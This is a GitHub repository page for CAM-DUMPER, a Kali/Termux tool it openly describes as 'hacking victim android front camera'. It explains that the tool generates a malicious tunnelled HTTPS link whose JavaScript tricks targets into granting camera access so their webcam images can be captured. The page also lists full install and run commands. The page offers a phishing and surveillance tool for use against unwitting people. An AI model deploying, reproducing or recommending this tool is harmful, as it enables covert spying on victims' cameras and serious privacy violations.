Skip to content

KALI LINUX / TERMUX tool for hacking victim android front camera.

License

Notifications You must be signed in to change notification settings

SarmadBytes/CAM-DUMPER

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

cam-dumper

Take webcam shots from target just sending a malicious link

How it works?

The tool generates a malicious HTTPS page using Serveo or Ngrok Port Forwarding methods, and a javascript code to cam requests using MediaDevices.getUserMedia.

The MediaDevices.getUserMedia() method prompts the user for permission to use a media input which produces a MediaStream with tracks containing the requested types of media. That stream can include, for example, a video track (produced by either a hardware or virtual video source such as a camera, video recording device, screen sharing service, and so forth), an audio track (similarly, produced by a physical or virtual audio source like a microphone, A/D converter, or the like), and possibly other track types.

See more about MediaDEvices.getUserMedia() here

To convince the target to grant permissions to access the cam, the page uses a javascript code made by https://github.com/wybiral that turns the favicon into a cam stream.

Installing (Kali Linux/Termux):

$apt update && apt upgrade
$apt install git
$apt install php
$git clone https://github.com/LiNuX-Mallu/CAM-DUMPER.git
$cd CAM-DUMPER
$chmod +x camdumper.sh ngrok

$bash camdumper.sh

then make your hotspot on and choose ngrok because serveo is down..  BINGO🔥




About

KALI LINUX / TERMUX tool for hacking victim android front camera.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Shell 65.3%
  • HTML 23.5%
  • PHP 11.2%